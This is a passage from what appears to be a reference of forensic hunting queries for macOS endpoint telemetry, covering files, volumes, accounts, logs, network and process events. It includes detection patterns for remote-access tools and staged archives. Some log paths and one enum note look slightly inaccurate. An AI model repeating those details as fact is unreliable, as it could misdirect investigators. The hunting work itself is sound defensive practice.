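    _rec("aid-placeholder-2", 1700000070, "/Users/alice/Library/payload", "sha256-placeholder-8"),
]

if __name__ == "__main__":
    # With a threshold of 3 only the single .scr file remains; the three .bak
    # files are a group of exactly 3 and fail the "< threshold" test.
    for row in hunt_uncommon_extensions(SAMPLE_RECORDS, threshold=3):
        print(row["_count"], row["extension"], row["TargetFileName"])
```

The double-extension drop is worth remembering when reading real results: archive.tar.gz never appears in the output of the query, whatever its prevalence.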

List all files in any /tmp/ folder

#event_simpleName=FileInfo | TargetFileName = "*/tmp/*" | table([aid, ContextTimeStamp, TargetFileName, Size, UserName, SHA256HashData, UnixMode], limit=max)

Identify large files

#event_simpleName=FileInfo (TargetFileName=*.tar OR TargetFileName=*.zip OR TargetFileName=*.gzip OR TargetFileName=*.part OR TargetFileName=*.tar.gz OR TargetFileName=*.gz OR TargetFileName=*.rar OR TargetFileName=*.tgz OR TargetFileName=*.bz2) NOT TargetFileName=*.log | Size > 999999999 | table([aid, ContextTimeStamp, TargetFileName, Size, UserName, SHA256HashData, UnixMode], limit=max)

FsVolumeMounted

Show All Fields

#event_simpleName=FsVolumeMounted ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, cid, ForensicsCollectionIdentifier, Flags, VolumeBusName, VolumeBusPath, VolumeDeviceModel, VolumeDevicePath, VolumeDeviceProtocol, VolumeDeviceRevision, VolumeDeviceInternal, VolumeDeviceVendor, VolumeIsNetwork, VolumeMediaBSDName, VolumeMediaBSDMajor, VolumeMediaBSDMinor, VolumeMediaBSDUnit, VolumeMediaContent, VolumeMediaEjectable, VolumeMediaName, VolumeMediaUUID, VolumeMediaSize, VolumeMediaWhole, VolumeMediaWritable, VolumeMountPoint, VolumeSectorSize], limit=max)

Show Volume Device Info

#event_simpleName=FsVolumeMounted ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, cid, ForensicsCollectionIdentifier, Flags, VolumeBusName, VolumeBusPath, VolumeDeviceModel, VolumeDevicePath, VolumeDeviceProtocol, VolumeDeviceRevision, VolumeDeviceInternal, VolumeDeviceVendor, VolumeIsNetwork], limit=max)

Show Volume Media Info

#event_simpleName=FsVolumeMounted ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, cid, ForensicsCollectionIdentifier, Flags, VolumeBusName, VolumeBusPath, VolumeMediaBSDName, VolumeMediaBSDMajor, VolumeMediaBSDMinor, VolumeMediaBSDUnit, VolumeMediaContent, VolumeMediaEjectable, VolumeMediaName, VolumeMediaUUID, VolumeMediaSize, VolumeMediaWhole, VolumeMediaWritable, VolumeMountPoint, VolumeSectorSize], limit=max)

GroupAccount

Show all Fields

#event_simpleName=GroupAccount ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | parseInt("GID") | table([time, aid, cid, ForensicsCollectionIdentifier, GID, UnixGroupName, GroupMemberUIDs], limit=max)

Users in group wheel

#event_simpleName=GroupAccount UnixGroupName=wheel ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, cid, ForensicsCollectionIdentifier, GID, UnixGroupName, GroupMemberUIDs], limit=max)

The UIDs returned can be queried using the UserAccount event for further user account information. For example:

#event_simpleName=UserAccount ForensicsCollectionIdentifier= UID=

InstalledApplication

Show all Fields

#event_simpleName=InstalledApplication ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | InstallDate := parseTimeStamp(field=InstallDate, format=seconds) | InstallDate := formatTime("%F %T", field=InstallDate) | BatchTimestamp := parseTimeStamp(field=BatchTimestamp, format=seconds) | BatchTimestamp := formatTime("%F %T", field=BatchTimestamp) | table([InstallDate, time, BatchTimestamp, aid, cid, ForensicsCollectionIdentifier, AppName, AppVersion, AppIdentificationData, AnnotationData, AppArchetecture, AppPath, AppPathFlag, AppProvider, AppType, BatchDataNumber, BatchDataTotal, UpdateFlag], limit=max)

Show results for a specific installed app of interest

#event_simpleName=InstalledApplication ForensicsCollectionIdentifier=* | AppName= <app name> | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | InstallDate := parseTimeStamp(field=InstallDate, format=seconds) | InstallDate := formatTime("%F %T", field=InstallDate) | BatchTimestamp := parseTimeStamp(field=BatchTimestamp, format=seconds) | BatchTimestamp := formatTime("%F %T", field=BatchTimestamp) | table([time, InstallDate, BatchTimestamp, aid, cid, ForensicsCollectionIdentifier, AppName, AppVersion, AppIdentificationData, AnnotationData, AppArchetecture, AppPath, AppPathFlag, AppProvider, AppType, BatchDataNumber, BatchDataTotal, UpdateFlag], limit=max)
Note: Replace <app name> with the name of the application of interest.

KernelExtension

Show all Fields

#event_simpleName=KernelExtension ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, cid, ForensicsCollectionIdentifier, BundleID, MacBundleInfo, KernelExtensionName, MacBundleVersion, ExtensionIsLoaded, TargetFileName], limit=max)

Show if a specific kernel extension is loaded

#event_simpleName=KernelExtension ForensicsCollectionIdentifier=* | KernelExtensionName = <extension of interest> | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, cid, ForensicsCollectionIdentifier, BundleID, MacBundleInfo, KernelExtensionName, MacBundleVersion, ExtensionIsLoaded, TargetFileName], limit=max)

Show only loaded kernel extensions (ExtensionIsLoaded is an enum and needs to be converted to a string first; 1 means true)

#event_simpleName=KernelExtension ForensicsCollectionIdentifier=* | ExtensionIsLoaded = 1 | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, cid, ForensicsCollectionIdentifier, BundleID, MacBundleInfo, KernelExtensionName, MacBundleVersion, ExtensionIsLoaded, TargetFileName], limit=max)

LocalIpAddressIp4

Show all Fields

#event_simpleName=LocalIpAddressIP4 ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, AddressFamily, InterfaceAlias, IfType, InterfaceDescription, InterfaceIdentifier, InterfaceIndex, LocalAddressIP4, NetLuidIndex, NetworkInterfaceGuid, PhysicalAddress, PermanentPhysicalAddress, PhysicalAddressLength, aid, cid, ForensicsCollectionIdentifier], limit=max)

LocalIpAddressIp6

Show all Fields

#event_simpleName=LocalIpAddressIP6 ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, AddressFamily, InterfaceAlias, IfType, InterfaceDescription, InterfaceIdentifier, InterfaceIndex, LocalAddressIP6, NetLuidIndex, NetworkInterfaceGuid, PhysicalAddress, PermanentPhysicalAddress, PhysicalAddressLength, aid, cid, ForensicsCollectionIdentifier], limit=max)

LogEntry

Show all Fields

#event_simpleName=LogEntry ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, FfcLogConfidenceInterval, FfcLogOrigin, FfcLogSourceType, ForensicsText, FfcStructuredLogEntry], limit=max)

Show UTMP log records with attributes

#event_simpleName=LogEntry ForensicsCollectionIdentifier=* FfcLogSourceType = LOG_UTMPRECORD | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, FfcLogConfidenceInterval, FfcLogOrigin, FfcLogSourceType, ForensicsText, FfcStructuredLogEntry], limit=max)

Show all but UTMP log records

#event_simpleName=LogEntry ForensicsCollectionIdentifier=* | NOT FfcLogSourceType = LOG_UTMPRECORD | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, FfcLogConfidenceInterval, FfcLogOrigin, FfcLogSourceType, ForensicsText, FfcStructuredLogEntry], limit=max)

Show Remote login attempts

#event_simpleName=LogEntry ForensicsCollectionIdentifier=* | FfcLogOrigin = "/var/log/audit/audit.log*" | (ForensicsText=*screensharingd* OR ForensicsText=*sshd* OR ForensicsText=*login* OR ForensicsText=*loginwindow* OR ForensicsText=*remoting_me2me_host* OR ForensicsText=*TeamViewer*) | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, FfcLogConfidenceInterval, FfcLogOrigin, FfcLogSourceType, ForensicsText, FfcStructuredLogEntry], limit=max)

Show macOS system.log entries

#event_simpleName=LogEntry ForensicsCollectionIdentifier=* FfcLogOrigin = "/private/var/db/system.log*" | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, FfcLogConfidenceInterval, FfcLogOrigin, FfcLogSourceType, ForensicsText, FfcStructuredLogEntry], limit=max)

Show Apple Unified Logs

#event_simpleName=LogEntry ForensicsCollectionIdentifier=* FfcLogSourceType=LOG_APPLEUNIFIED | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, cid, ForensicsCollectionIdentifier, FfcLogOrigin, FfcLogSourceType, FfcLogConfidenceInterval, FfcStructuredLogEntry, ForensicsText], limit=max)

Show Apple System Logs

#event_simpleName=LogEntry ForensicsCollectionIdentifier=* FfcLogSourceType=LOG_APPLESYSTEMLOG | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, cid, ForensicsCollectionIdentifier, FfcLogOrigin, FfcLogSourceType, FfcLogConfidenceInterval, FfcStructuredLogEntry, ForensicsText], limit=max)

Show spotlight log events

#event_simpleName=LogEntry ForensicsCollectionIdentifier=* FfcLogSourceType=LOG_APPLESPOTLIGHT | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, cid, ForensicsCollectionIdentifier, FfcLogOrigin, FfcLogSourceType, FfcLogConfidenceInterval, FfcStructuredLogEntry, ForensicsText], limit=max)

MacMRU

Show all Fields

#event_simpleName=MacMRU ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | TargetCreationTime := rename(MacBookmarkTargetCreationDate) | TargetCreationTime := parseTimeStamp(field=TargetCreationTime, format=seconds) | TargetCreationTime := formatTime("%F %T", field=TargetCreationTime) | BookmarkCreationTime := rename(MacBookmarkCreationDate) | BookmarkCreationTime := parseTimeStamp(field=BookmarkCreationTime, format=seconds) | BookmarkCreationTime := formatTime("%F %T", field=BookmarkCreationTime) | VolumeCreationDate := parseTimeStamp(field=VolumeCreationDate, format=seconds) | VolumeCreationDate := formatTime("%F %T", field=VolumeCreationDate) | eval(VolumeMediaSize = VolumeMediaSize/1048576) | VolumeMediaSizeMB := rename(VolumeMediaSize) | round(VolumeMediaSizeMB, as=VolumeMediaSizeMB) | table([time, BookmarkCreationTime, aid, cid, ForensicsCollectionIdentifier, MacBookmarkCreatorUID, MacBookmarkCreatorUserName, MacBookmarkDisplayName, TargetCreationTime, MacBookmarkTargetFileName, MacBookmarkTargetURL, MacBookmarkTargetPath, CFUrlResourcePropertyFlags, CFUrlVolumePropertyFlags, VolumeName, VolumeUUID, VolumeMountPoint, VolumeMediaSizeMB, VolumeIsRoot, MacMruIndex], limit=max)

Search by username of Bookmark creator

#event_simpleName=MacMRU ForensicsCollectionIdentifier=* MacBookmarkCreatorUserName= <insert Username> | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | TargetCreationTime := rename(MacBookmarkTargetCreationDate) | TargetCreationTime := parseTimeStamp(field=TargetCreationTime, format=seconds) | TargetCreationTime := formatTime("%F %T", field=TargetCreationTime) | BookmarkCreationTime := rename(MacBookmarkCreationDate) | BookmarkCreationTime := parseTimeStamp(field=BookmarkCreationTime, format=seconds) | BookmarkCreationTime := formatTime("%F %T", field=BookmarkCreationTime) | VolumeCreationDate := parseTimeStamp(field=VolumeCreationDate, format=seconds) | VolumeCreationDate := formatTime("%F %T", field=VolumeCreationDate) | eval(VolumeMediaSize = VolumeMediaSize/1048576) | VolumeMediaSizeMB := rename(VolumeMediaSize) | round(VolumeMediaSizeMB, as=VolumeMediaSizeMB) | table([time, BookmarkCreationTime, aid, cid, ForensicsCollectionIdentifier, MacBookmarkCreatorUID, MacBookmarkCreatorUserName, MacBookmarkDisplayName, TargetCreationTime, MacBookmarkTargetFileName, MacBookmarkTargetURL, MacBookmarkTargetPath, CFUrlResourcePropertyFlags, CFUrlVolumePropertyFlags, VolumeName, VolumeUUID, VolumeMountPoint, VolumeMediaSizeMB, VolumeIsRoot, MacMruIndex], limit=max)
Note: Replace <insert Username> with the username of the bookmark creator.

MacFsEventRecord

Show All Fields

#event_simpleName=MacFsEventRecord ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, cid, ForensicsCollectionIdentifier, TargetFileName, FsEventFlagString, FsEventFlag, FsEventId, FsEventNodeId, FsEventType], limit=max)

Show By Flag Event

#event_simpleName=MacFsEventRecord ForensicsCollectionIdentifier=* FsEventFlagString= <insert flag> | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, cid, ForensicsCollectionIdentifier, TargetFileName, FsEventFlagString, FsEventFlag, FsEventId, FsEventNodeId, FsEventType], limit=max)
Note: Replace <insert flag> with a flag such as Created, Removed, Renamed, Modified, PermissionChanged, IsFile, or IsDirectory. For example, FsEventFlagString = Removed shows all FsEvents with the flag "Removed".

MacKnowledge

Show all Fields

Start

#event_simpleName=MacKnowledgeActivityStart ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, cid, ForensicsCollectionIdentifier, KnowledgeActivityStreamName, KnowledgeActivityValue, KnowledgeActivityId, KnowledgeActivitySourceBundleId, KnowledgeActivitySourceDeviceId, KnowledgeActivitySourceGroupId, KnowledgeActivitySourceUserId, KnowledgeActivityType, KnowledgeActivityTitle, KnowledgeActivityWebPageUrl, KnowledgeActivityNotificationBundleId, KnowledgeActivityCustomMetadataName, KnowledgeActivityCustomMetadataValue, KnowledgeActivitySafariHistory, KnowledgeActivityWebDomain], limit=max)

End

#event_simpleName=MacKnowledgeActivityEnd ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, cid, ForensicsCollectionIdentifier, KnowledgeActivityStreamName, KnowledgeActivityValue, KnowledgeActivityId, KnowledgeActivitySourceBundleId, KnowledgeActivitySourceDeviceId, KnowledgeActivitySourceGroupId, KnowledgeActivitySourceUserId, KnowledgeActivityType, KnowledgeActivityTitle, KnowledgeActivityWebPageUrl, KnowledgeActivityNotificationBundleId, KnowledgeActivityCustomMetadataName, KnowledgeActivityCustomMetadataValue, KnowledgeActivitySafariHistory, KnowledgeActivityWebDomain], limit=max)
Note: This query is for all available fields; a portion of fields may be blank. The condensed query will prune some empty fields.
Condensed Fields

Start

#event_simpleName=MacKnowledgeActivityStart ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, cid, ForensicsCollectionIdentifier, KnowledgeActivityStreamName, KnowledgeActivityValue, KnowledgeActivityId], limit=max)

End

#event_simpleName=MacKnowledgeActivityEnd ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, cid, ForensicsCollectionIdentifier, KnowledgeActivityStreamName, KnowledgeActivityValue, KnowledgeActivityId], limit=max)
Note: This query is condensed and prunes many fields that may be blank. Any of them can be re-added by appending them to the table statement.
Search by value

Start

#event_simpleName=MacKnowledgeActivityStart ForensicsCollectionIdentifier=* KnowledgeActivityValue= <Value to search by> | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, KnowledgeActivityStreamName, KnowledgeActivityValue, KnowledgeActivityId], limit=max)

End

#event_simpleName=MacKnowledgeActivityEnd ForensicsCollectionIdentifier=* KnowledgeActivityValue= <Value to search by> | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, KnowledgeActivityStreamName, KnowledgeActivityValue, KnowledgeActivityId], limit=max)

NetworkCloseIP4

Show all Fields

#event_simpleName=NetworkCloseIP4 ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, RawProcessId, RemoteAddressIP4, RemotePort, LocalAddressIP4, LocalPort, ConnectionDirection, ConnectionFlags, Protocol, InContext, FfcNetworkState], limit=max)

NetworkCloseIP6

Show all Fields

#event_simpleName=NetworkCloseIP6 ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, RawProcessId, RemoteAddressIP6, RemotePort, LocalAddressIP6, LocalPort, ConnectionDirection, ConnectionFlags, Protocol, InContext, FfcNetworkState], limit=max)

NetworkConnectIP4

Show all Fields

#event_simpleName=NetworkConnectIP4 ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, RawProcessId, RemoteAddressIP4, RemotePort, LocalAddressIP4, LocalPort, ConnectionDirection, ConnectionFlags, Protocol, InContext, FfcNetworkState], limit=max)

NetworkConnectIP6

Show all Fields

#event_simpleName=NetworkConnectIP6 ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, RawProcessId, RemoteAddressIP6, RemotePort, LocalAddressIP6, LocalPort, ConnectionDirection, ConnectionFlags, Protocol, InContext, FfcNetworkState], limit=max)

NetworkEndPointDataUsage

Show All Fields

#event_simpleName=NetworkEndPointDataUsage ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, NetworkAttachmentFirstTimeStamp, NetworkAttachmentTimeStamp, NetworkAttachmentIdentifier, NetworkAttachmentSignature, IsNetworkHotspot, IsNetworkKnownGood, LiveRouteBytesInCount, LiveRouteBytesOutCount, LiveRouteConnectionAttempts, LiveRouteConnectionSuccesses, LiveRouteKind, LiveRouteKindAsString, LiveRoutePacketsInCount, LiveRoutePacketsOutCount], limit=max)

Search by Live Route Bytes In

#event_simpleName=NetworkEndPointDataUsage ForensicsCollectionIdentifier=* LiveRouteBytesInCount > NUMBERINBYTES | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, NetworkAttachmentFirstTimeStamp, NetworkAttachmentTimeStamp, NetworkAttachmentIdentifier, NetworkAttachmentSignature, IsNetworkHotspot, IsNetworkKnownGood, LiveRouteBytesInCount, LiveRouteBytesOutCount, LiveRouteConnectionAttempts, LiveRouteConnectionSuccesses, LiveRouteKind, LiveRouteKindAsString, LiveRoutePacketsInCount, LiveRoutePacketsOutCount], limit=max)
Note: Replace NUMBERINBYTES with a number of bytes. You can also replace LiveRouteBytesInCount with other fields such as LiveRoutePacketsInCount, and the comparison operator with other comparison operators such as < or =.

Search by Live Route Bytes Out

#event_simpleName=NetworkEndPointDataUsage ForensicsCollectionIdentifier=* LiveRouteBytesOutCount > NUMBERINBYTES | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, NetworkAttachmentFirstTimeStamp, NetworkAttachmentTimeStamp, NetworkAttachmentIdentifier, NetworkAttachmentSignature, IsNetworkHotspot, IsNetworkKnownGood, LiveRouteBytesInCount, LiveRouteBytesOutCount, LiveRouteConnectionAttempts, LiveRouteConnectionSuccesses, LiveRouteKind, LiveRouteKindAsString, LiveRoutePacketsInCount, LiveRoutePacketsOutCount], limit=max)
Note: Replace NUMBERINBYTES with a number of bytes. You can also replace LiveRouteBytesOutCount with other fields such as LiveRoutePacketsOutCount, and the comparison operator with other comparison operators such as < or =.

NetworkListenIP4

Show all Fields

#event_simpleName=NetworkListenIP4 ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, RawProcessId, RemoteAddressIP4, RemotePort, LocalAddressIP4, LocalPort, ConnectionDirection, ConnectionFlags, Protocol, InContext, FfcNetworkState], limit=max)

NetworkListenIP6

Show all Fields

#event_simpleName=NetworkListenIP6 ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, cid, ForensicsCollectionIdentifier, RawProcessId, RemoteAddressIP6, RemotePort, LocalAddressIP6, LocalPort, ConnectionDirection, ConnectionFlags, Protocol, InContext, FfcNetworkState], limit=max)

NetworkReceiveAcceptIP4

Show all Fields

#event_simpleName=NetworkReceiveAcceptIP4 ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, cid, ForensicsCollectionIdentifier, RawProcessId, RemoteAddressIP4, RemotePort, LocalAddressIP4, LocalPort, ConnectionDirection, ConnectionFlags, Protocol, InContext, FfcNetworkState], limit=max)

NetworkReceiveAcceptIP6

Show all Fields

#event_simpleName=NetworkReceiveAcceptIP6 ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, cid, ForensicsCollectionIdentifier, RawProcessId, RemoteAddressIP6, RemotePort, LocalAddressIP6, LocalPort, ConnectionDirection, ConnectionFlags, Protocol, InContext, FfcNetworkState], limit=max)

OsVersionInfo

Show all Fields

#event_simpleName=OsVersionInfo ForensicsCollectionIdentifier=*
| ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds)
| time := formatTime("%F %T", field=ContextTimeStamp)
| default(field=[AgentVersion], value="No Sensor Installed", replaceEmpty=true)
| table([time, MajorVersion, MinorVersion, OSVersionString, OSVersionFileName, OSVersionFileData, PlatformId, ProductName, ProductType, AgentVersion, SystemTimeZone], limit=max)

ProcessDataUsage

Show All Fields

#event_simpleName=ProcessDataUsage ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, cid, ForensicsCollectionIdentifier, TargetProcessName, LiveUsageTimestamp, ProcessTimeStamp, ProcessFirstTimeStamp, LiveUsageKind, LiveUsageOpt, LiveUsageTableId, LiveUsageWifiInCount, LiveUsageWifiOutCount, LiveUsageWiredInCount, LiveUsageWiredOutCount, LiveUsageWwanInCount, LiveUsageWwanOutCount, LiveUsageXInCount, LiveUsageXOutCount, SourceFileName, BundleID], limit=max)

Show All Fields with Live Usage Wifi In greater than NUMBERUSAGE

#event_simpleName=ProcessDataUsage ForensicsCollectionIdentifier=* LiveUsageWifiInCount > NUMBERUSAGE | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, cid, ForensicsCollectionIdentifier, TargetProcessName, LiveUsageTimestamp, ProcessTimeStamp, ProcessFirstTimeStamp, LiveUsageKind, LiveUsageOpt, LiveUsageTableId, LiveUsageWifiInCount, LiveUsageWifiOutCount, LiveUsageWiredInCount, LiveUsageWiredOutCount, LiveUsageWwanInCount, LiveUsageWwanOutCount, LiveUsageXInCount, LiveUsageXOutCount, SourceFileName, BundleID], limit=max)
Note: Replace NUMBERUSAGE with a wifi usage number. You can also replace LiveUsageWifiInCount with other fields such as LiveUsageWiredInCount, and the comparison operator with other comparison operators, such as < or =.

Show All Fields with Live Usage Wifi Out greater than NUMBERUSAGE

#event_simpleName=ProcessDataUsage ForensicsCollectionIdentifier=* LiveUsageWifiOutCount > NUMBERUSAGE | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, cid, ForensicsCollectionIdentifier, TargetProcessName, LiveUsageTimestamp, ProcessTimeStamp, ProcessFirstTimeStamp, LiveUsageKind, LiveUsageOpt, LiveUsageTableId, LiveUsageWifiInCount, LiveUsageWifiOutCount, LiveUsageWiredInCount, LiveUsageWiredOutCount, LiveUsageWwanInCount, LiveUsageWwanOutCount, LiveUsageXInCount, LiveUsageXOutCount, SourceFileName, BundleID], limit=max)
Note: Replace NUMBERUSAGE with a wifi usage number. You can also replace LiveUsageWifiOutCount with other fields such as LiveUsageWiredOutCount, and the comparison operator with other comparison operators, such as < or =.

ProcessRollup2

Show all Fields

#event_simpleName=ProcessRollup2 ForensicsCollectionIdentifier=* | ProcessStartTime := parseTimeStamp(field=ProcessStartTime, format=seconds) | ProcessStartTime := formatTime("%F %T", field=ProcessStartTime) | table([ProcessStartTime, aid, ForensicsCollectionIdentifier, RawProcessId, ImageFileName, CommandLine, EnvironmentVariables, CurrentWorkingPath, ProcessPriority, ProcessThreadCount, ProcessNiceValue, VirtualMemorySize, RGID, RSS, RUID, RawProcessID, SVGID, SVUID, TtyName, UID], limit=max)

Search for process information with a command line of interest

#event_simpleName=ProcessRollup2 ForensicsCollectionIdentifier=* CommandLine=<CommandLine of interest> | ProcessStartTime := parseTimeStamp(field=ProcessStartTime, format=seconds) | ProcessStartTime := formatTime("%F %T", field=ProcessStartTime) | table([ProcessStartTime, aid, cid, ForensicsCollectionIdentifier, RawProcessId, ImageFileName, CommandLine, EnvironmentVariables, CurrentWorkingPath, ParentProcessID, ProcessPriority, ProcessThreadCount, ProcessNiceValue, ResidentSetSize, VirtualMemorySize, GID, RGID, RSS, RUID, SVGID, RawProcessID, SVUID, TtyName, ControllingTerminal, UID], limit=max)

Search for process information with an image file name of interest

#event_simpleName=ProcessRollup2 ForensicsCollectionIdentifier=* ImageFileName=<ImageFileName of interest> | ProcessStartTime := parseTimeStamp(field=ProcessStartTime, format=seconds) | ProcessStartTime := formatTime("%F %T", field=ProcessStartTime) | table([ProcessStartTime, aid, cid, ForensicsCollectionIdentifier, RawProcessId, ImageFileName, CommandLine, EnvironmentVariables, CurrentWorkingPath, ParentProcessID, ProcessPriority, ProcessThreadCount, ProcessNiceValue, ResidentSetSize, VirtualMemorySize, GID, RGID, RSS, RUID, SVGID, RawProcessID, SVUID, TtyName, ControllingTerminal, UID], limit=max)

The RawProcessID returned per process can be queried using the Network* and RawBind* events for network data related to a specific process. For example:

#event_simpleName=Network* ForensicsCollectionIdentifier=<collectionid> ContextProcessId=<Context Process ID> ImageFileName=<ImageFileName of interest> | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, RemoteAddressIP4, RemoteAddressIP6, RemotePort, LocalAddressIP4, LocalAddressIP6, LocalPort, ConnectionDirection, ConnectionFlags, Protocol, ContextProcessId, ContextThreadId, InContext], limit=max)

Quarantine

LSQuarantineEvent

Show all Fields

#event_simpleName=LSQuarantineEvent ForensicsCollectionIdentifier=*
| ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds)
| time := formatTime("%F %T", field=ContextTimeStamp)
| table([time, aid, ForensicsCollectionIdentifier, TargetFileName, UserName, QuarantineEventIdentifier, QuarantineAgentBundleIdentifier, QuarantineAgentName, QuarantineDataURL, QuarantineSenderName, QuarantineSenderAddress, QuarantineTypeNumber, QuarantineOriginTitle, QuarantineOriginURL, QuarantineOriginAlias], limit=max)

QuarantineXattribute

Show all Fields

#event_simpleName=QuarantineXattribute ForensicsCollectionIdentifier=*
| ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds)
